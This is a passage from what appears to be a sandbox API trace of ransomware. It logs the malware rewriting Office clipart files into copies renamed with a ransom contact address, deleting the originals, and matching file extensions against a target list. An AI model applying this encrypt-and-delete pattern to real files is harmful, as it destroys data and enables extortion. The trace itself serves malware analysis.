Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099169.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.755] GetLastError () returned 0x0 [0069.755] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x27d0, lpOverlapped=0x0) returned 1 [0069.798] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x27e0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x27e0, lpOverlapped=0x0) returned 1 [0069.799] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.799] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.799] SetEndOfFile (hFile=0x368) returned 1 [0069.802] CloseHandle (hObject=0x368) returned 1 [0069.803] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.803] SetEndOfFile (hFile=0x380) returned 1 [0069.812] CloseHandle (hObject=0x380) returned 1 [0069.815] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.815] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099169.wmf")) returned 1 [0069.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF") returned 68 [0069.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF") returned 68 [0069.831] lstrlenW (lpString=".doc") returned 4 [0069.831] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.831] lstrlenW (lpString=".docx") returned 5 [0069.831] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0069.831] lstrlenW (lpString=".pdf") returned 4 [0069.831] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.831] lstrlenW (lpString=".xls") returned 4 [0069.832] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.832] lstrlenW (lpString=".xlsx") returned 5 [0069.832] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0069.832] lstrlenW (lpString=".ppt") returned 4 [0069.832] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF") returned 68 [0069.832] lstrlenW (lpString=".zip") returned 4 [0069.832] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.832] lstrlenW (lpString=".rar") returned 4 [0069.832] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.832] lstrlenW (lpString=".bz2") returned 4 [0069.832] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.832] lstrlenW (lpString=".7z") returned 3 [0069.832] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF") returned 68 [0069.832] lstrlenW (lpString=".dbf") returned 4 [0069.832] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF") returned 68 [0069.832] lstrlenW (lpString=".1cd") returned 4 [0069.832] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099169.WMF") returned 68 [0069.832] lstrlenW (lpString=".jpg") returned 4 [0069.832] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.833] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.833] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099181.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0069.833] GetLastError () returned 0x0 [0069.833] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ae, lpOverlapped=0x0) returned 1 [0069.855] WriteFile (in: hFile=0x308, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4b0, lpOverlapped=0x0) returned 1 [0069.856] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.856] WriteFile (in: hFile=0x308, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.856] SetEndOfFile (hFile=0x308) returned 1 [0069.856] CloseHandle (hObject=0x308) returned 1 [0069.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.856] SetEndOfFile (hFile=0x368) returned 1 [0069.857] CloseHandle (hObject=0x368) returned 1 [0069.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.857] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099181.wmf")) returned 1 [0069.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF") returned 68 [0069.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF") returned 68 [0069.858] lstrlenW (lpString=".doc") returned 4 [0069.858] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.858] lstrlenW (lpString=".docx") returned 5 [0069.858] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0069.858] lstrlenW (lpString=".pdf") returned 4 [0069.858] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.858] lstrlenW (lpString=".xls") returned 4 [0069.858] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.858] lstrlenW (lpString=".xlsx") returned 5 [0069.858] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0069.858] lstrlenW (lpString=".ppt") returned 4 [0069.858] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF") returned 68 [0069.858] lstrlenW (lpString=".zip") returned 4 [0069.858] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.858] lstrlenW (lpString=".rar") returned 4 [0069.858] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.858] lstrlenW (lpString=".bz2") returned 4 [0069.858] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.858] lstrlenW (lpString=".7z") returned 3 [0069.858] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF") returned 68 [0069.858] lstrlenW (lpString=".dbf") returned 4 [0069.859] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF") returned 68 [0069.859] lstrlenW (lpString=".1cd") returned 4 [0069.859] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF") returned 68 [0069.859] lstrlenW (lpString=".jpg") returned 4 [0069.859] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.865] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.865] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099185.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0069.867] GetLastError () returned 0x0 [0069.867] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xcd2, lpOverlapped=0x0) returned 1 [0069.902] WriteFile (in: hFile=0x36c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xce0, lpOverlapped=0x0) returned 1 [0069.903] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.903] WriteFile (in: hFile=0x36c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.903] SetEndOfFile (hFile=0x36c) returned 1 [0069.909] CloseHandle (hObject=0x36c) returned 1 [0069.909] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.909] SetEndOfFile (hFile=0x380) returned 1 [0069.910] CloseHandle (hObject=0x380) returned 1 [0069.910] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.910] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099185.jpg")) returned 1 [0069.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG") returned 68 [0069.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG") returned 68 [0069.910] lstrlenW (lpString=".doc") returned 4 [0069.910] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.910] lstrlenW (lpString=".docx") returned 5 [0069.910] lstrcmpiW (lpString1=".docx", lpString2="5.JPG") returned -1 [0069.911] lstrlenW (lpString=".pdf") returned 4 [0069.911] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.911] lstrlenW (lpString=".xls") returned 4 [0069.911] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.911] lstrlenW (lpString=".xlsx") returned 5 [0069.911] lstrcmpiW (lpString1=".xlsx", lpString2="5.JPG") returned -1 [0069.911] lstrlenW (lpString=".ppt") returned 4 [0069.911] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG") returned 68 [0069.911] lstrlenW (lpString=".zip") returned 4 [0069.911] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.911] lstrlenW (lpString=".rar") returned 4 [0069.911] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.911] lstrlenW (lpString=".bz2") returned 4 [0069.911] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.911] lstrlenW (lpString=".7z") returned 3 [0069.911] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG") returned 68 [0069.911] lstrlenW (lpString=".dbf") returned 4 [0069.911] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG") returned 68 [0069.911] lstrlenW (lpString=".1cd") returned 4 [0069.911] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099185.JPG") returned 68 [0069.911] lstrlenW (lpString=".jpg") returned 4 [0069.911] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.912] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.912] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099189.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0069.912] GetLastError () returned 0x0 [0069.912] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1f8c, lpOverlapped=0x0) returned 1 [0069.976] WriteFile (in: hFile=0x36c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1f90, lpOverlapped=0x0) returned 1 [0069.976] ReadFile (in: hFile=0x380, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.977] WriteFile (in: hFile=0x36c, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.977] SetEndOfFile (hFile=0x36c) returned 1 [0069.977] CloseHandle (hObject=0x36c) returned 1 [0069.977] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.977] SetEndOfFile (hFile=0x380) returned 1 [0069.978] CloseHandle (hObject=0x380) returned 1 [0069.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.978] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099189.jpg")) returned 1 [0069.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG") returned 68 [0069.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG") returned 68 [0069.979] lstrlenW (lpString=".doc") returned 4 [0069.979] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.979] lstrlenW (lpString=".docx") returned 5 [0069.979] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1 [0069.979] lstrlenW (lpString=".pdf") returned 4 [0069.979] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.979] lstrlenW (lpString=".xls") returned 4 [0069.979] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.979] lstrlenW (lpString=".xlsx") returned 5 [0069.979] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1 [0069.979] lstrlenW (lpString=".ppt") returned 4 [0069.979] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG") returned 68 [0069.979] lstrlenW (lpString=".zip") returned 4 [0069.979] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.979] lstrlenW (lpString=".rar") returned 4 [0069.979] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.979] lstrlenW (lpString=".bz2") returned 4 [0069.979] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.979] lstrlenW (lpString=".7z") returned 3 [0069.979] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG") returned 68 [0069.979] lstrlenW (lpString=".dbf") returned 4 [0069.979] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG") returned 68 [0069.980] lstrlenW (lpString=".1cd") returned 4 [0069.980] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG") returned 68 [0069.980] lstrlenW (lpString=".jpg") returned 4 [0069.980] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.982] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.982] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099191.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0069.983] GetLastError () returned 0x0 [0069.983] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xf39f, lpOverlapped=0x0) returned 1 [0070.027] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xf3a0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xf3a0, lpOverlapped=0x0) returned 1 [0070.028] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.028] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.029] SetEndOfFile (hFile=0x368) returned 1 [0070.029] CloseHandle (hObject=0x368) returned 1 [0070.029] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.029] SetEndOfFile (hFile=0x340) returned 1 [0070.030] CloseHandle (hObject=0x340) returned 1 [0070.030] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.030] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099191.jpg")) returned 1 [0070.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG") returned 68 [0070.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG") returned 68 [0070.031] lstrlenW (lpString=".doc") returned 4 [0070.031] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0070.031] lstrlenW (lpString=".docx") returned 5 [0070.031] lstrcmpiW (lpString1=".docx", lpString2="1.JPG") returned -1 [0070.031] lstrlenW (lpString=".pdf") returned 4 [0070.031] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0070.031] lstrlenW (lpString=".xls") returned 4 [0070.031] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0070.031] lstrlenW (lpString=".xlsx") returned 5 [0070.031] lstrcmpiW (lpString1=".xlsx", lpString2="1.JPG") returned -1 [0070.031] lstrlenW (lpString=".ppt") returned 4 [0070.031] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0070.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG") returned 68 [0070.031] lstrlenW (lpString=".zip") returned 4 [0070.031] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0070.031] lstrlenW (lpString=".rar") returned 4 [0070.031] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0070.031] lstrlenW (lpString=".bz2") returned 4 [0070.031] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0070.031] lstrlenW (lpString=".7z") returned 3 [0070.031] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0070.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG") returned 68 [0070.031] lstrlenW (lpString=".dbf") returned 4 [0070.031] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0070.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG") returned 68 [0070.032] lstrlenW (lpString=".1cd") returned 4 [0070.032] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0070.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099191.JPG") returned 68 [0070.032] lstrlenW (lpString=".jpg") returned 4 [0070.032] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0070.032] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.032] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099193.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099193.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0070.033] GetLastError () returned 0x0 [0070.033] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x8ada, lpOverlapped=0x0) returned 1 [0070.046] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x8ae0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x8ae0, lpOverlapped=0x0) returned 1 [0070.047] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.047] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.047] SetEndOfFile (hFile=0x368) returned 1 [0070.048] CloseHandle (hObject=0x368) returned 1 [0070.048] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.048] SetEndOfFile (hFile=0x340) returned 1 [0070.049] CloseHandle (hObject=0x340) returned 1 [0070.049] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 